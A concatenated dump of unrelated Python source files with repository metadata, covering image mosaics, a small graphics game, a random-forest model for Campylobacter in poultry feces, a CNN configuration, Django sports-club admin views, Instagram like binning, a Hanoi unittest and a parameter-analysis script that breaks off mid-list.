def add_pieces_random(params: Parameters):
start_time = timeit.default_timer()
N, H, W, C = params.small_images.shape
h, w, c = params.image_resized.shape
num_pieces = params.num_pieces_vertical * params.num_pieces_horizontal
bigger_image = np.zeros((h + H, w + W, c))
img_mosaic = np.zeros((h + H, w + W, c), np.uint8)
for i in range(h + H):
for j in range(w + W):
for k in range(c):
if i < h and j < w:
bigger_image[i, j, k] = params.image_resized[i, j, k]
else:
bigger_image[i, j, k] = 0
free_pixels = np.zeros((h + H, w + W), dtype=int)
nr = 0
for i in range(h + H):
for j in range(w + W):
if i < h and j < w:
free_pixels[i, j] = nr
else:
free_pixels[i, j] = -1
nr += 1
if params.criterion == 'aleator':
None
elif params.criterion == 'distantaCuloareMedie':
mean_color_pieces = np.mean(params.small_images, axis=(1, 2))
while True:
free_ = free_pixels[free_pixels > -1]
if len(free_) == 0:
break
index = np.random.randint(low=0, high=len(free_), size=1)
row = math.floor(free_[index] / free_pixels.shape[1])
col = math.floor(free_[index] % free_pixels.shape[1])
patch = bigger_image[row:row + H, col:col + W]
mean_patch = np.mean(patch, axis=(0, 1))
index = get_sorted_indices(mean_color_pieces, mean_patch)[0]
img_mosaic[row:row + H, col:col + W] = params.small_images[index]
free_pixels[row:row + H, col:col + W] = -1
img_mosaic = img_mosaic[0:h, 0:w, :]
else:
print('Error! unknown option %s' % params.criterion)
exit(-1)
end_time = timeit.default_timer()
print('Running time: %f s.' % (end_time - start_time))
return img_mosaic
def add_pieces_hexagon(params: Parameters):
start_time = timeit.default_timer()
N, H, W, C = params.small_images.shape
h, w, c = params.image_resized.shape
num_pieces = params.num_pieces_vertical * params.num_pieces_horizontal
bigger_image = np.zeros((h + 2 * H, w + 2 * W, C))
img_mosaic = np.zeros((h + 2 * H, w + 2 * W, c), np.uint8)
nr_vertical = h + 2 * H
nr_horizontal = w + 2 * W
small_images_indexes = np.zeros((nr_vertical, nr_horizontal))
nr = 0
mask = np.zeros((H, W, C), dtype=int)
for i in range(H):
for j in range(W):
for k in range(C):
mask[i, j, k] = 1
width_divided_by_3 = int(W / 3)
for i in range(H):
for j in range(W):
for k in range(C):
if i < H / 2 - 1 and j < width_divided_by_3 and i + j <= H / 2 - 2:
mask[i, j, k] = 0
if i < H / 2 - 1 and j > 2 * width_divided_by_3 and i <= j - 2 * width_divided_by_3 - 1:
mask[i, j, k] = 0
if i > H / 2 and j < width_divided_by_3 and i - H / 2 > j:
mask[i, j, k] = 0
if i > H / 2 and j > 2 * width_divided_by_3 and i - H / 2 - 1 + j - 2 * width_divided_by_3 - 1 >= H / 2 - 2:
mask[i, j, k] = 0
with open('masca.txt', 'w') as f:
for row in mask:
for elem in row:
f.write("%s " % elem)
f.write("\n")
mean_color_pieces = np.mean(params.small_images, axis=(1, 2))
print(mean_color_pieces.shape)
for i in range(H, h + H):
for j in range(W, w + W):
for k in range(c):
bigger_image[i, j, k] = params.image_resized[i - H, j - W, k]
first_row_start = 14
row_index = 1
for i in range(first_row_start, bigger_image.shape[0] - H, H):
col_index = 0
for j in range(0, bigger_image.shape[1] - W, W + width_divided_by_3):
patch = bigger_image[i: i + H, j: j + W]
mean_patch = np.mean(patch, axis=(0, 1))
index = get_sorted_indices(mean_color_pieces, mean_patch)
for ii in index:
if row_index > 1:
if small_images_indexes[row_index - 2, col_index] == ii:
continue
if col_index > 0:
if small_images_indexes[row_index, col_index - 2] == ii:
continue
if row_index < small_images_indexes.shape[0] - 2 and col_index > 1:
if small_images_indexes[row_index + 2, col_index - 2] == ii:
continue
break
index = ii
img_mosaic[i: i + H, j: j + W] = (1 - mask) * img_mosaic[i: i + H, j: j + W] + mask * params.small_images[index]
small_images_indexes[row_index, col_index] = index
col_index += 2
row_index += 2
row_index = 0
for i in range(0, bigger_image.shape[0] - H, H):
col_index = 0
for j in range(2 * width_divided_by_3, bigger_image.shape[1] - W, W + width_divided_by_3):
patch = bigger_image[i: i + H, j: j + W]
mean_patch = np.mean(patch, axis=(0, 1))
index = get_sorted_indices(mean_color_pieces, mean_patch)
for ii in index:
if row_index > 1 and col_index > 1:
if small_images_indexes[row_index - 2, col_index - 2] == ii:
continue
if col_index > 1:
if small_images_indexes[row_index, col_index - 2] == ii:
continue
if row_index > 1:
if small_images_indexes[row_index - 2, col_index] == ii:
continue
break
index = ii
img_mosaic[i: i + H, j: j + W] = (1 - mask) * img_mosaic[i: i + H, j: j + W] + mask * params.small_images[index]
small_images_indexes[row_index, col_index] = index
col_index += 2
row_index += 2
img_mosaic = img_mosaic[H: H + h, W: W + w, ]
end_time = timeit.default_timer()
print('Running time: %f s.' % (end_time - start_time))
return img_mosaic
|
[
"predacatalin99@gmail.com"
] |
predacatalin99@gmail.com
|
753fcfdcb661bc572d8a1c5e7ede1d3024ca7494
|
91bd632a44a636953d569ed14229523c0551abb7
|
/zad14_2.py
|
5238cdb787ca77f5a029f91041fb2a54b1716c8b
|
[
"MIT"
] |
permissive
|
kamilhabrych/python-semestr5-lista14
|
c58206b6bad8454b5c928a66dd95388524ba5184
|
b5dea544d98a1badbd6fee9e6220196a5f9dd7c0
|
refs/heads/main
| 2023-03-12T11:15:01.032592
| 2021-03-08T14:43:50
| 2021-03-08T14:43:50
| 344,571,785
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 774
|
py
|
from graphics import *
max_width = 500
max_height = 500
win = GraphWin('Kamil Habrych zadanie 2', max_width, max_height)
win.setBackground('white')
circle = Circle(Point(250,250),50)
circle.setFill('brown')
circle.draw(win)
lengthOfMove = 20
while True:
pt_circle = circle.getCenter()
r_circle = circle.getRadius()
key = win.getKey()
if key == 'w' and pt_circle.y - r_circle > 0:
circle.move(0,-lengthOfMove)
elif key == 's' and pt_circle.y + r_circle < max_height:
circle.move(0,lengthOfMove)
elif key == 'a' and pt_circle.x - r_circle > 0:
circle.move(-lengthOfMove,0)
elif key == 'd' and pt_circle.x + r_circle < max_width:
circle.move(lengthOfMove,0)
elif key == 'q':
break
win.close()
|
[
"noreply@github.com"
] |
kamilhabrych.noreply@github.com
|
24317dd98c1779c905c0a9984bad14e30e1b61d2
|
82b018b01a20685e080ee4cb6de3e8bfe816df23
|
/Chapter 5/campy_rf_feces.py
|
29a76d2c4972c41821bb5b84317ac240fcf5ded6
|
[] |
no_license
|
cgolden1993/Dissertation
|
ce0008c43d789547d557276984fdd7e992045eaf
|
96790cff770cf64010b61921277117c7c2e081ac
|
refs/heads/master
| 2020-12-29T23:47:51.496704
| 2020-03-02T16:36:44
| 2020-03-02T16:36:44
| 238,782,708
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,016
|
py
|
import pandas as pd
import numpy as np
from collections import Counter
from pprint import pprint
#import time
import matplotlib.pyplot as plt
#plt.style.use('ggplot') #changes plot styles to ggplot
from scipy.stats import randint as sp_randint
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import RandomizedSearchCV
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, confusion_matrix
from sklearn.metrics import classification_report
from sklearn.metrics import roc_curve, roc_auc_score
import joblib
import sys
sys.path.append('/Users/cegolden/Projects/Weather/Model_Development/')
#to determine run time of script
#start = time.time()
#define function that loads data via LoadData function
def LoadData():
global X_train, X_test, y_train, y_test, feces
global feature_columns, n_features, response_column
full = pd.read_excel("/Users/cegolden/Projects/Weather/Model_Development/Copy_of_Meteorological_poultry_data.xlsx", sheet_name = "Campylobacter")
#delete indicator variables
full = full.drop(full.columns[[0, 1, 2, 4, 5, 7]], axis=1)
#split data into soil and feces
feces = full[full.SampleType == 'Feces']
#drop sample type for each data set
feces = feces.drop(feces.columns[0], axis=1)
#get column names and store them
feature_columns = list(feces.columns)
feature_columns.remove('CampyCef')
response_column = ['CampyCef']
#get number of features
n_features = len(feature_columns)
#split up into x and y where y is response variable
#.values turns df into array
X_feces = feces.drop('CampyCef', axis=1).values
y_feces = feces['CampyCef']
#convert + into 1 and - into 0 and make this column an array
y_feces = y_feces.map({'+': 1, '-': 0}).values
#split into training and testing sets
X_train, X_test, y_train, y_test = train_test_split(X_feces, y_feces, test_size = 0.2, random_state = 151, stratify = y_feces)
print('Original dataset shape %s' % Counter(y_train))
return
def ModelFit():
global best_model
#contruct hyperparameter grid
param_dist = {"max_depth": [3, 10, 20, 70, None],
"max_features": [2, 10, 41, 80, 'sqrt'],
"min_samples_split": sp_randint(2, 11),
"min_samples_leaf": sp_randint(1, 11),
#"bootstrap": [True, False],
"criterion": ["gini", "entropy"],
"n_estimators": [100, 300, 500, 800, 1000]}
pprint(param_dist)
#define random forest classifier function
rf = RandomForestClassifier(random_state = 120)
#search across 1000 randomized combinations in the above grid
estimator = RandomizedSearchCV(estimator = rf, param_distributions = param_dist, n_iter = 1000, cv = 10, verbose = 10, random_state = 12, scoring = 'roc_auc', n_jobs = -1)
#fit the model
grid_result = estimator.fit(X_train, y_train)
#find and define best estimator based on grid search
best_model = grid_result.best_estimator_
print('\nbest_model:\n', best_model)
#predict y based on test data
y_pred = grid_result.predict(X_test)
#accuracy score
print('accuracy score:', accuracy_score(y_test, y_pred))
#confusion matrix
tn, fp, fn, tp = confusion_matrix(y_test, y_pred).ravel()
print(tn,fp,fn,tp)
#classification report
print('\nclassification report:\n',classification_report(y_test, y_pred))
#AUC and ROC curve
y_pred_prob = grid_result.predict_proba(X_test)[:,1]
auc = roc_auc_score(y_test, y_pred_prob)
print('auc:', auc)
false_positive, true_positive, _ = roc_curve(y_test, y_pred_prob)
font = {'fontname':'Helvetica'}
plt.figure()
plt.plot([0, 1], [0, 1], 'k--')
plt.plot(false_positive, true_positive, color='black')
plt.xlabel('False positive rate', **font)
plt.ylabel('True positive rate', **font)
plt.savefig('feces_roc.png', dpi=300)
plt.show()
# Save the model as a pickle in a file
joblib.dump(grid_result, 'campy_rf_feces.pkl')
#determine best features
feature_importances = grid_result.best_estimator_.feature_importances_
column_names=list(feces)
    del column_names[0]  # drop the response column, assumed to be the first entry
importance = pd.DataFrame(feature_importances, index=column_names, columns=["Importance"])
sort_importance = importance.sort_values(by=['Importance'], ascending = False)
sort_column_names = sort_importance.index.values.tolist()
mult = 100/(sort_importance['Importance'].iloc[0])
sort_imp_mult = sort_importance * mult
top_imp = sort_imp_mult['Importance'].iloc[0:15].tolist()
top_column_names = sort_column_names[0:15]
top_column_names = ['AvgMaxGustSpeed1.6',
'AvgAverageHumidity1.7',
'AverageHumidityTwoDayBefore',
'AvgMaxGustSpeed1.3',
'AvgMaxGustSpeed1.5',
'AvgMinTemperature1.7',
'AvgMaxWindSpeed1.7',
'AvgMinHumidity1.4',
'AvgMaxHumidity1.3',
'AvgPrecipitation1.4',
'MaxGustSpeedOneDayBefore',
'AvgMaxGustSpeedS1.2',
'AvgMaxWindSpeed1.4',
'AvgAverageHumidity1.3',
'MaxGustSpeedTwoDayBefore']
plt.rcParams.update(plt.rcParamsDefault)
y_ticks = np.arange(0, len(top_column_names))
fig, ax = plt.subplots()
ax.barh(y_ticks, top_imp, color = "dimgray")
ax.set_yticklabels(top_column_names, **font)
ax.set_yticks(y_ticks)
plt.xlabel('Relative Importance', **font)
fig.tight_layout()
plt.gca().invert_yaxis()
plt.savefig('feces_var.png', dpi=300)
plt.show()
return
LoadData()
ModelFit()
#to determine run time of script
#print('This program took {0:0.1f} seconds'.format(time.time() - start))
|
[
"cgolden1993@gmail.com"
] |
cgolden1993@gmail.com
|
c7062d7318e35df1a0692c6a4756df7f166434ae
|
fac7a965a035c713b83890b7384648c1d83a179a
|
/ML/cnn_config.py
|
4f1f620700687bdaf3c7ec600dbf9e10aa52e248
|
[
"Apache-2.0"
] |
permissive
|
shiyxg/tremor
|
160b170cf44c863a9c485662cfb04281f1b2919d
|
18c4efa8104fe2aba9789488aeca200b6fa143e5
|
refs/heads/master
| 2020-03-23T21:38:34.039712
| 2018-07-25T03:25:52
| 2018-07-25T03:25:52
| 142,121,763
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,446
|
py
|
# -*- coding:utf-8
class CNNConf:
def __init__(self):
self.INPUT_SHAPE = [32, 32, 1]
self.OUTPUT_SHAPE = [32, 32, 1]
self.conv = []
self.conv.append({
'name': 'convBlock1',
'times': 2,
'filterSize': [3, 3],
'outputChn': 64,
'strideSize': [1, 1],
'is_training': True
})
self.conv.append({
'name': 'convBlock2',
'times': 2,
'filterSize': [3, 3],
'outputChn': 128,
'strideSize': [1, 1],
'is_training': True
})
self.conv.append({
'name': 'convBlock3',
'times': 2,
'filterSize': [3, 3],
'outputChn': 256,
'strideSize': [1, 1],
'is_training': True
})
self.conv.append({
'name': 'convBlock4',
'times': 2,
'filterSize': [3, 3],
'outputChn': 512,
'strideSize': [1, 1],
'is_training': True
})
self.NN = []
self.NN.append({
'name': 'NN1',
'num': 4096
})
self.NN.append({
'name': 'NN2',
'num': 4096
})
self.NN.append({
'name': 'output',
'num': self.INPUT_SHAPE[0]*self.INPUT_SHAPE[1]
})
|
[
"shiyxg@163.com"
] |
shiyxg@163.com
|
403712191e3ca6c3157643b795608c3c3134eecb
|
81efa90f461bfcb2569a570626fe69b59f3b221a
|
/Core/views/administracion/inicio/views.py
|
8bdcbb7b0f890dc227ba71a4e8d35c495a677e43
|
[] |
no_license
|
gonvazsua/SportManagement
|
1760188f2ba54964a33805981eee191a14822baf
|
cdc0ed7a625ad1e2ea754074d2594d6a5b1a3b99
|
refs/heads/master
| 2021-04-09T16:10:29.550367
| 2016-11-27T10:51:52
| 2016-11-27T10:51:52
| 31,132,158
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,680
|
py
|
# -*- encoding: utf-8 -*-
from Core.utils import *
from django.db.models import *
from datetime import date,datetime
from django.conf import settings
from django.db.models import Q
import logging
from django.contrib.auth.decorators import login_required
from Core.utils import cargar_tipos_notificaciones_settings
# Log instance
logger = logging.getLogger(__name__)
ruta_pagina_principal = 'administracion/inicio/pagina_principal.html'
ruta_imprimir_planificacion = 'administracion/inicio/imprimir.html'
@login_required()
def perfil_administrador(request, id_usuario):
perfil = comprueba_usuario_administrador(id_usuario, request)
    # This is only done on the main page
    # Load data into the session, if necessary
    # Store in the session a list of {club_name, club_id} pairs for the clubs where the player is an administrator; keep the first one as the initial club to display:
if not "nombre_club_id" in request.session or not "club_id" in request.session:
clubes_administrador = Club.objects.filter(
id__in = PerfilRolClub.objects.values_list('club_id', flat=True).filter(perfil = perfil, rol_id = settings.ROL_ADMINISTRADOR)
).order_by('nombre')
es_primer_club = True
club_id = None
nombre_club_id = {}
for c in clubes_administrador:
if es_primer_club:
club_id = c.id
es_primer_club = False
nombre_club_id[c.nombre] = c.id
request.session["club_id"] = club_id
request.session["nombre_club_id"] = nombre_club_id
else:
club_id = request.session["club_id"]
club = Club.objects.get(id = club_id)
try:
rutaTiempo = ""#RutaTiempo.objects.get(municipio=club.municipio)
except Exception:
rutaTiempo = ""
num_jugadores = PerfilRolClub.objects.filter(club = club, perfil__user__is_active = True).count()
num_partidos_hoy = Partido.objects.annotate(num_perfiles=Count('perfiles')).filter(pista__club=club, fecha__startswith=date.today(), num_perfiles=4).count()
num_partidos_abiertos_hoy = Partido.objects.annotate(num_perfiles=Count('perfiles')).filter(
fecha__startswith=date.today(), num_perfiles__lt=4, num_perfiles__gt=0, pista__in=Pista.objects.filter(club=club)).count()
if request.method == "POST":
franja_horaria_id = request.POST.get('franja_horaria')
if franja_horaria_id:
franja_horaria_actual = FranjaHora.objects.get(id = franja_horaria_id)
else:
franja_horaria_actual = FranjaHora.objects.filter(club = club, inicio__lt=datetime.now().time(), fin__gt=datetime.now().time()).first()
else:
franja_horaria_actual = FranjaHora.objects.filter(club = club, inicio__lt=datetime.now().time(), fin__gt=datetime.now().time()).first()
    # Fetch the time slots for the listing
franjas_horarias = FranjaHora.objects.filter(club = club).order_by('inicio')
if franja_horaria_actual:
num_partidos_en_juego = Partido.objects.annotate(num_perfiles=Count('perfiles')).filter(
pista__in=Pista.objects.filter(club=club),
franja_horaria=franja_horaria_actual,
num_perfiles=4,
fecha=date.today()).count()
else:
num_partidos_en_juego = 0
franja_horaria_actual = FranjaHora.objects.filter(club = club).order_by('inicio').first()
    #Matches in the current time slot
partidos_ahora = Partido.objects.annotate(num_perfiles=Count('perfiles')).filter(
pista__in = Pista.objects.filter(club=club), franja_horaria=franja_horaria_actual,
num_perfiles = 4
)
pistas = Pista.objects.filter(club = club).order_by("deporte", "orden", "nombre")
    #Courts and their matches for the time slot
pistas_partidos = {}
for p in pistas:
try:
partido = Partido.objects.get(pista = p, franja_horaria = franja_horaria_actual, fecha__startswith=date.today())
pistas_partidos[p] = partido
except Partido.DoesNotExist:
pistas_partidos[p] = ""
    #Notifications
try:
campos_fijos_query = Q(estado = settings.ESTADO_NULL, leido = settings.ESTADO_NO)
notificaciones = Notificacion.objects.filter(
Q(
Q(tipo__in = (settings.TIPO_NOTIF_UNIRSE_A_PARTIDO, settings.TIPO_NOTIF_INSCRIPCION_CLUB)) &
(Q(club = club) | Q(partido__pista__club = club)) & campos_fijos_query
) |
Q(
Q(tipo = settings.TIPO_NOTIF_COMENTARIO_PARTIDO, jugador = perfil) & campos_fijos_query
)
).order_by("-fecha")[:5]
except Exception:
notificaciones = []
municipio_guiones = separa_guiones(club.municipio.municipio)
data = {'perfil':perfil, 'club':club, 'num_jugadores':num_jugadores, 'num_partidos_hoy':num_partidos_hoy,
'num_partidos_abiertos_hoy':num_partidos_abiertos_hoy,
'num_partidos_en_juego':num_partidos_en_juego, 'franja_horaria_actual':franja_horaria_actual,
'pistas_partidos':pistas_partidos, 'pistas':pistas,
'rutaTiempo':rutaTiempo, 'notificaciones':notificaciones,
'franjas_horarias':franjas_horarias, 'municipio_guiones':municipio_guiones
}
data = cargar_tipos_notificaciones_settings(data)
return render_to_response(ruta_pagina_principal, data, context_instance=RequestContext(request))
#View that switches the club currently active in the session
@login_required()
def cambio_club_administrador(request, id_usuario, club_id):
request.session["club_id"] = club_id
return HttpResponseRedirect("/administrador/"+id_usuario)
def separa_guiones(cadena):
res = ""
split_cadena = cadena.split(" ")
for index, s in enumerate(split_cadena):
res += s
if index != len(split_cadena)-1:
res += "-"
return res
def separa_comas(lista_perfiles):
res = ""
if len(lista_perfiles) > 0:
cont = 0
for user in lista_perfiles:
if cont != 0:
res = res + ", "
res = res + str(user)
cont = cont + 1
return res
#Print the daily schedule
@login_required()
def imprimir_planificacion(request, club_id):
mapa_franjas_pista = {}
mapa_pista_partido = {}
data = {}
try:
hoy = date.today()
pistas = Pista.objects.filter(club__id = club_id).order_by("orden")
franjas = FranjaHora.objects.filter(club__id = club_id).order_by("inicio")
for fh in franjas.all():
mapa_pista_partido = {}
for pista in pistas.all():
try:
                    #Look up the match for this court and time slot (FH)
partido = Partido.objects.filter(fecha = hoy, franja_horaria__id = fh.id, pista__id = pista.id)[:1].get()
perfiles = []
for perfil in partido.perfiles.all():
perfiles.append(perfil.user.username)
except Partido.DoesNotExist:
partido = None
perfiles = []
                #Update the court-to-match map
mapa_pista_partido[pista] = separa_comas(perfiles)
            #For each time slot, update its courts
mapa_franjas_pista[fh] = mapa_pista_partido
data["mapa_franjas_pistas"] = mapa_franjas_pista
    except Exception:
error = "Ha habido un error al imprimir la planificación"
data["error"] = error
data["hoy"] = hoy
return render_to_response(ruta_imprimir_planificacion, data, context_instance=RequestContext(request))
|
[
"gonzalovazquezs@gmail.com"
] |
gonzalovazquezs@gmail.com
|
167a6dc35b93695c5bd036b9b48511a56c1c7163
|
0d0a4eeafb0273ee42367d0c936343d5b95b909d
|
/flask_blueprint_example/flaskScriptPrint/BluePrint2.py
|
d1d81e9536688ca81b20be9b71540da2026cd4ef
|
[] |
no_license
|
wenxuefeng3930/FlaskProject
|
4e52a394a034ce9f0b40684a04049a446bc94625
|
84569744adec76d9cfd8abc18fa51f0bad3e7bf5
|
refs/heads/master
| 2023-07-03T01:16:16.402369
| 2019-08-14T00:25:41
| 2019-08-14T00:25:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 244
|
py
|
"""
Multi-blueprint command-line mode: blueprint 2
"""
from flask import Blueprint
simple_blueprint2 = Blueprint("simple_page2", __name__)  # create the blueprint
# Blueprint routes and views
@simple_blueprint2.route("/index2")
def index():
return "hello world2"
|
[
"laobian@qq.com"
] |
laobian@qq.com
|
7bae6397d5e871161b74b1423b0f7d92af2179e7
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_protectorates.py
|
dd027b0d6daa7f7d43e89f657ed8332912ed0cf6
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 280
|
py
|
from xai.brain.wordbase.nouns._protectorate import _PROTECTORATE
#class header
class _PROTECTORATES(_PROTECTORATE, ):
def __init__(self,):
_PROTECTORATE.__init__(self)
self.name = "PROTECTORATES"
self.specie = 'nouns'
self.basic = "protectorate"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
7cb82e50a3b526596f89c5dc582ba08e64e4b9ac
|
7a9441513330da0c72b459e1293897b4845d0b28
|
/support_tools/bins.py
|
dbfc6a5a020685c6b059685a592e417370a53d62
|
[] |
no_license
|
ap190/LearnDeeply
|
64d1123bebf25478499131b15bce66bc1cdfeaa0
|
a673574bbcfc3e146eeae3eba362fc26de0cdb05
|
refs/heads/master
| 2020-04-07T10:25:53.490318
| 2019-12-24T06:11:56
| 2019-12-24T06:11:56
| 158,286,591
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,701
|
py
|
import json
import os
from collections import Counter
import matplotlib.pyplot as plt
import numpy as np
"""
Class to create bins for likes, and for classifying likes to each bin with labels,
along with other support methods to visualize distribution.
"""
class bins:
def __init__(self, bin_nums = 10):
self.bin_nums = bin_nums
self.likes_array = self.count_elements()
self.sequence, self.bin_edges = self.numpy_histogram()
def count_elements(self):
"""
        Count the likes per post and store their frequency table.
        Input: Null
        Output: likes_array[sequence]; also sets self.counted{num_likes: frequency}
"""
likes_array = []
with open("data.json", 'rb') as f:
loaded_json = json.load(f)
for user in loaded_json:
for post in user['images']:
num_likes = post['likes']
if type(num_likes) is str:
num_likes = int(num_likes.replace(",", ""))
if num_likes < 10870:
likes_array.append(num_likes)
        print(len(likes_array))
        # Keep the frequency table so ascii_histogram() can use it later.
        self.counted = Counter(likes_array)
        return likes_array
def get_LFR_for_user(self, user_data):
"""
Returns a list of LFR for a users posts.
"""
num_folowers = user_data["followers"]
if type(num_folowers) is str:
num_folowers = num_folowers.replace(",", "")
if "m" in num_folowers:
num_folowers = num_folowers.replace("m", "")
num_folowers = float(num_folowers) * 1000000
elif "k" in num_folowers:
num_folowers = num_folowers.replace("k", "")
num_folowers = float(num_folowers) * 1000
num_folowers = int(num_folowers)
posts = user_data["images"]
lfr_for_posts = []
for post in posts:
num_likes = post["likes"]
if type(num_likes) is str:
num_likes = num_likes.replace(",", "")
num_likes = int(num_likes)
lfr_for_posts.append(round(num_likes/num_folowers, 4))
return lfr_for_posts
def get_LFR_for_all_users(self):
"""
        Gets the like-to-follower ratio (LFR) for every post of every user in data.json, as one flat list.
"""
with open("data.json") as file:
data = json.load(file)
lfr_for_all_posts = []
for user in data:
lfr_for_all_posts += self.get_LFR_for_user(user)
return lfr_for_all_posts
def ascii_histogram(self):
"""
Print frequency histogram in terminal.
Input: Null
Output: Null
"""
for k in sorted(self.counted):
print('{0:5d} {1}'.format(k, '+' * self.counted[k]))
def numpy_histogram(self):
"""
Input: bin_nums[number of bins]
        Output: hist[y-axis values for histogram], bin_edges[x-axis values for histogram]
"""
hist, bin_edges = np.histogram(self.likes_array, bins = self.bin_nums)
# Show hist and bin_edges
print(hist)
print(bin_edges)
return hist, bin_edges
def visualize_histogram(self):
"""
Visualize the histogram.
Input: likes_array[sequence], bin_nums[number of bins].
Output: Null
"""
plt.hist(self.likes_array, bins = self.bin_nums)
plt.xlabel('Bins(number of likes)')
plt.ylabel('Posts')
plt.title('Histogram of %d Even Distributed Bins' % (self.bin_nums))
plt.show()
return
def even_bins(self):
"""
Create even bins based on sequence and number of bins.
Input: likes_array[sequence], bin_nums[number of bins]
        Output: interval[number of posts in each bin], sequence[sequence of posts], bin_edges[x-axis values for histogram]
"""
likes_array = sorted(self.likes_array)
hist, bin_edges = [], []
interval = len(likes_array)//self.bin_nums
for i in range(len(likes_array)):
if i%interval == 0:
bin_edges.append(likes_array[i])
sequence = likes_array[:self.bin_nums*interval]
return interval, sequence, bin_edges
def bin_classification(self, likes):
for i in range(1, len(self.bin_edges)):
if (likes > self.bin_edges[i-1]) and (likes <= self.bin_edges[i]):
return i-1
return i-1
# BIN = bins(bin_nums = 100)
# BIN.visualize_histogram()
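# A minimal usage sketch (not part of the original file). It assumes a
# data.json file is present in the working directory, as count_elements()
# above requires.
if __name__ == "__main__":
    b = bins(bin_nums=10)
    print(b.bin_classification(500))  # index of the bin that 500 likes falls into
    b.visualize_histogram()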
|
[
"qi_feng@brown.edu"
] |
qi_feng@brown.edu
|
19bc16da22037d022ce0059b019ffe42ab352117
|
d9788c9ad7ffcb089a89f436bdf06886b8995e24
|
/task30.py
|
3a85dbfecafd4f9795ed47035123346a378e805b
|
[] |
no_license
|
akyl-3008/p2t30
|
99a1d6edaf9f216223f5925e60123aa26f547c87
|
3613cce639fdaee1de28db9e1525cb2fbe3b35e3
|
refs/heads/master
| 2020-12-02T02:14:53.828850
| 2019-12-30T05:48:23
| 2019-12-30T05:48:23
| 230,855,659
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 70
|
py
|
wordy = ("privet", "privet", "kak", "ty")
print(wordy.count("privet"))
|
[
"akyl-3008@example.com"
] |
akyl-3008@example.com
|
b49f4867b92765140fea43924ef77775fdeaa1ca
|
b738f097345e3ef491fa18ae8fb4d0df52d28423
|
/done/python-tdd@polsl/test-sample.py
|
ed622673efa7d832e0e22a8297c527e4f676e656
|
[
"MIT"
] |
permissive
|
afronski/presentations
|
f2bc1ea4b36f097a1cd497c47fd920565859c7cc
|
86bc641c760bf532ae0db593ae4f4fe3545a7c86
|
refs/heads/master
| 2021-05-04T11:55:52.409420
| 2018-02-12T11:25:41
| 2018-02-12T11:25:41
| 5,912,257
| 2
| 2
| null | 2013-11-03T20:24:33
| 2012-09-22T10:41:22
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 542
|
py
|
import unittest
def hanoi(n):
return 2 ** n - 1
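# hanoi(n) is the closed form of the Tower of Hanoi recurrence
# T(n) = 2*T(n-1) + 1 with T(0) = 0, i.e. the minimum number of moves.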
class TestGame(unittest.TestCase):
def setUp(self):
pass
def testBasicCase(self):
        assert hanoi(3) == 7, "3 Hanoi disks can be moved in 7 moves"
    def testLowerEdgeCase(self):
        assert hanoi(0) == 0, "0 disks = 0 moves"
    def testTrivialCase(self):
        assert hanoi(1) == 1, "1 disk = 1 move"
    def testAnotherCase(self):
        assert hanoi(2) == 3, "2 disks = 3 moves"
if __name__ == "__main__":
unittest.main()
|
[
"afronski@gmail.com"
] |
afronski@gmail.com
|
fb06ffd44f5a47e94e7f283d995aa7086e4026b8
|
324a2bdacb4b6c6286ce6886bca412cca283d649
|
/src/gym/test_parameters/analyze_comb.py
|
147145a8f48c1c03ffb5967f7de0245965229e70
|
[
"Apache-2.0"
] |
permissive
|
shaymargolis/PCC-RL
|
1c244640e68df4b811bb980147cb95e277bd3966
|
947a0016480db57a3bd1f96f3f892180d707496b
|
refs/heads/master
| 2023-02-10T03:01:13.496385
| 2020-12-04T15:25:45
| 2020-12-04T15:25:45
| 265,189,635
| 0
| 0
|
NOASSERTION
| 2020-05-19T08:27:52
| 2020-05-19T08:27:51
| null |
UTF-8
|
Python
| false
| false
| 2,470
|
py
|
import os
import numpy as np
import json
import pandas as pd
import tqdm
from src.gym.visualizer.single_sender_visualizer import SingleSenderVisualizer
INPUT_DIR = "/cs/labs/schapiram/shaymar/parameter_tests/comb_env"
data = []
class FakeEnv:
def reset(self, bool=False):
return None
def analyze_file(file):
vis = SingleSenderVisualizer(FakeEnv(), [], 0)
vis._load_data(file)
send = np.array(vis.data[0]["send"])
optim = np.array(vis.data[0]["optim"])
sig = np.array(vis.data[0]["significance"])[:, 0]
diffRate = optim - send
absDiffRate = np.abs(diffRate)
avgSig = np.mean(sig)
sigFinal = np.mean(sig[-500:])
return [
np.sum(diffRate) / vis.data[0]["times"][-1], # DiffRate
np.sum(absDiffRate) / vis.data[0]["times"][-1], # absDiffRate
avgSig, # avgSig
sigFinal, # sigFinal
file # filename
]
def analyze_dir_with_params(dir_path, dir_params):
for file_name in os.listdir(INPUT_DIR + "/" + dir_path):
if file_name.endswith(".json"):
res = []
try:
res = analyze_file(INPUT_DIR + "/" + dir_path + "/" + file_name)
except Exception as e:
# print(e)
print("\t[x] Error while analyzing %s" % (INPUT_DIR + "/" + dir_path + "/" + file_name))
continue
arr = dir_params[:]
arr += res
data.append(arr)
def analyze_dir(dir_path):
params = dir_path.split("-")
# $combLr-$combLowerLr-$combMinProba--$twopLr-$twopLowerLr-$twopDelta
dir_params = [
params[0], # combLr
params[1], # combLowerLr
params[2], # combMinProba
params[4], # twopLr
params[5], # twopLowerLr
params[6], # twopDelta
]
analyze_dir_with_params(dir_path, dir_params)
# for dir_name in tqdm.tqdm(os.listdir(INPUT_DIR)):
# analyze_dir(dir_name)
dir_params = [
3000, # combLr
0, # combLowerLr
0.1, # combMinProba
